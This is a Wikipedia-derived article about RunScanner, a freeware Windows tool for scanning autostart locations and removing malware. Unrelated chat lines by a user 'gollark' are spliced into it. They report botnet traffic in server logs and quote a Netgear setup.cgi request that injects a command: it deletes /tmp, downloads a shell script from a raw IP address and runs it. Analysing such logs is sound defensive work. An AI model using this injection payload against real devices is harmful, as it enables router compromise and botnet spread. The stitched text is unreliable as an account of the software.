RunScanner

RunScanner is a freeware Microsoft Windows system utility which scans a windows system for all configured running programs and autostart locations.

RunScanner
Developer(s)Geert Moernaut
Stable release
2.0.0.60 / March 6, 2012 (2012-03-06)
Operating systemMicrosoft Windows
TypeMalware diagnostic & removal
LicenseFreeware
Websitehttp://www.runscanner.net

History

The program was created as a "best of both worlds" effort to combine all positive features in similar programs like HijackThis, Autoruns and Silentrunners. Unlike similar programs, RunScanner connects to an online database to rate the good and the bad items. The main purpose of the database is to do whitelisting [1] instead of blacklisting.

Usage

RunScanner scans all windows autostart locations and gives the user the possibility to delete misconfigured and malware items. Inexperienced users can post their log files to forums where specialist helpers can help them to solve their malware problems. Advanced users can use all features that modern malware fighters have come to expect.[2] Unlike other similar software, RunScanner can also exchange binary files with other users.

Main features
  • Scanning of 100+ hijack locations
  • Verification of file signatures
  • MD5 hash calculation of files
  • Online malware analysis of results
  • Extended filters
  • Item marking
  • Powerful process killer
  • Plain text logfile generation
  • Binary .run logfile generation
  • Hosts file editor
gollark: So now I'm actually wondering if this was a botnet programmed by edgy teenagers, or something.
gollark: I downloaded one of *those* to look at, and ran `strings` on it, and as well as what look like HTTP requests (presumably trying to exploit other devices), there are sets of strings like these:
gollark: I looked at the `.sh` file there, and it appears to just be trying to download and execute a bunch of binaries for different architectures.
gollark: So I was looking through my webserver logs, as you do, and I found a bunch of requests like this among the typical exploit-spam or whatever it is:```<> 91.80.163.224 [21/Aug/2020:00:10:44 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.95.168.247/Scylla.sh+-O+/tmp/Scylla.sh;sh+Scylla.sh&curpath=/&currentsetting.htm=1 HTTP/1.0" 200 31 "-" "-" ```
gollark: Oh right, Australia.

See also

References
  1. The rise of whitelisting
  2. Advanced Malware Cleaning (Mark Russinovich)
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.